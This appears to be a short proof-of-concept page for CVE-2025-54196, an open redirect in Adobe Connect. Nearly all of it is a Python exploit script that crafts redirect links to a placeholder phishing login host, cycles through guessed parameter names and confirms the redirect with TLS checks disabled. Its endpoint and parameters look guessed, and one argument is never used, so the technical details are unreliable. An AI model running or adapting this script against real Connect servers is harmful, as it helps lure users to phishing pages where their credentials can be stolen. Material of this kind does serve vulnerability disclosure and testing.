CVE-2025-54196：Adobe Connect开放重定向漏洞

# CVE-2025-54196 - Adobe Connect Open Redirect PoC # Vulnerability: URL Redirection to Untrusted Site # Affected: Adobe Connect <= 12.9 import requests from urllib.parse import urljoin, quote TARGET_HOST = "https://[connect-instance].adobeconnect.com" MALICIOUS_URL = "https://evil-phishing-site.example.com/login" def craft_open_redirect_url(target_host, redirect_param, malicious_url): """ Craft an open redirect URL exploiting CVE-2025-54196. The redirect parameter is not properly validated, allowing redirection to arbitrary external URLs. """ # Common parameter names used in redirect functionality params = ["redirect", "url", "next", "returnUrl", "redirectUrl", "goto"] for param in params: crafted_url = f"{target_host}/common/help/?{param}={quote(malicious_url, safe='')}" print(f"[+] Crafted URL with param '{param}': {crafted_url}") # Example crafted URL example_url = f"{target_host}/common/help/?{param}={quote(malicious_url, safe='')}" return example_url def verify_redirect(url, expected_redirect): """ Verify the open redirect by following the redirect chain. """ try: response = requests.get(url, allow_redirects=False, timeout=10, verify=False) if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location', '') print(f"[+] Server returned {response.status_code}") print(f"[+] Location header: {location}") if expected_redirect in location: print("[!] VULNERABLE: Open redirect confirmed!") return True else: print(f"[-] No redirect. Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-54196 - Adobe Connect Open Redirect PoC") print("=" * 60) crafted = craft_open_redirect_url(TARGET_HOST, "redirect", MALICIOUS_URL) print(f"\n[*] Testing crafted URL: {crafted}") verify_redirect(crafted, MALICIOUS_URL)